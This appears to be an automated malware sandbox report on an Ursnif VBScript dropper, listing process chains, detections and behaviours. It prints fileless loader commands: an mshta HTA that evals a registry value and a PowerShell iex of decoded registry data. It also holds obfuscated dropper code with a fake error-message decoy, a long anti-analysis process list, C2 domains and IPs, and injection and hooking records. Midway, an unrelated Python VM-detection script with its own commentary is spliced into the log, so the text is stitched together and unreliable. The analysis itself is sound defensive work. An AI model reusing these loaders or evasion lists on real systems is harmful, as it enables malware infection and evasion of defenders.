Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210910
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: classification engine Classification label: mal100.troj.evad.winVBS@17/16@6/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01202102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 34_2_01202102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{9E926C87-6559-80BB-DFB2-69B48306AD28}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: start[526268].vbs Static file information: File size 1402115 > 1048576
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01207E1F push ecx; ret 34_2_01207E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01207AB0 push ecx; ret 34_2_01207AB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7E1000 push eax; retf 39_2_0000019D8B7E1181
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7BC6E9 push 3B000001h; retf 39_2_0000019D8B7BC6EE
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\start[526268].vbs
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.563925033.000002CC0FD13000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1932 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6781 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2433 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
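The two WQL queries above are a common VM check: the script pulls Win32_Processor and Win32_ComputerSystem and looks for hypervisor vendor strings and toy CPU counts. The following is an added example (not the sample's logic and not Joe Sandbox code) that replays that kind of check over the same two classes so a sandbox operator can see which properties give the guest away. The marker substrings and the "fewer than two cores" threshold are the author's assumptions about what such a check looks for, and the GUEST/HARDENED rows are constructed; `collect_live()` runs the real queries through PowerShell's CIM cmdlets on a Windows host.

```python
"""Replay a WMI-based VM check over Win32_ComputerSystem / Win32_Processor rows.
Added example: heuristics are assumptions, sample rows are constructed."""
import json
import platform
import subprocess

# Assumed: substrings that identify common hypervisors in these CIM classes.
HYPERVISOR_MARKERS = ("VMWARE", "VIRTUALBOX", "INNOTEK", "QEMU", "XEN", "KVM",
                      "VIRTUAL MACHINE", "HYPER-V", "PARALLELS", "BOCHS")


def _has_marker(value):
    upper = str(value).upper()
    return any(m in upper for m in HYPERVISOR_MARKERS)


def vm_indicators(computer_system, processors):
    """Return (property, value, reason) triples that would flag a VM.

    computer_system: dict of Win32_ComputerSystem properties.
    processors: list of dicts, one per Win32_Processor instance.
    """
    findings = []
    for field in ("Manufacturer", "Model", "SystemFamily"):
        value = computer_system.get(field, "")
        if _has_marker(value):
            findings.append((f"Win32_ComputerSystem.{field}", str(value),
                             "hypervisor vendor string"))
    logical = int(computer_system.get("NumberOfLogicalProcessors") or 0)
    if 0 < logical < 2:
        findings.append(("Win32_ComputerSystem.NumberOfLogicalProcessors", str(logical),
                         "a single logical CPU is unusual on a real host"))
    for idx, cpu in enumerate(processors):
        name = cpu.get("Name", "")
        if _has_marker(name):
            findings.append((f"Win32_Processor[{idx}].Name", str(name),
                             "hypervisor string in CPU name"))
        cores = int(cpu.get("NumberOfCores") or 0)
        if 0 < cores < 2:
            findings.append((f"Win32_Processor[{idx}].NumberOfCores", str(cores),
                             "single-core CPU is unusual on a real host"))
    return findings


def collect_live():
    """Windows only: run the same two queries through the CIM cmdlets and
    return (computer_system, processors) in the shape vm_indicators expects."""
    if platform.system() != "Windows":
        raise RuntimeError("live collection requires Windows")

    def query(cls):
        cmd = f"Get-CimInstance {cls} | Select-Object * | ConvertTo-Json -Depth 2"
        out = subprocess.run(["powershell", "-NoProfile", "-Command", cmd],
                             capture_output=True, text=True, check=True).stdout
        data = json.loads(out)
        return data if isinstance(data, list) else [data]

    return query("Win32_ComputerSystem")[0], query("Win32_Processor")


# Constructed rows: what an unhardened VirtualBox guest typically reports.
GUEST = {"Manufacturer": "innotek GmbH", "Model": "VirtualBox", "NumberOfLogicalProcessors": 1}
GUEST_CPUS = [{"Name": "Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz", "NumberOfCores": 1}]
# Constructed rows: the same guest after the DMI strings were overridden and it was given cores.
HARDENED = {"Manufacturer": "Dell Inc.", "Model": "OptiPlex 7070", "NumberOfLogicalProcessors": 4}
HARDENED_CPUS = [{"Name": "Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz", "NumberOfCores": 4}]

if __name__ == "__main__":
    for label, cs, cpus in (("unhardened", GUEST, GUEST_CPUS), ("hardened", HARDENED, HARDENED_CPUS)):
        print(label, vm_indicators(cs, cpus) or "no VM indicators")
```

Run `collect_live()` inside the analysis VM and feed the result to `vm_indicators()`; anything it returns is a property to override before detonating samples that issue these queries.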
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs Jump to dropped file
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3388 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 736E1580 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' Jump to behavior
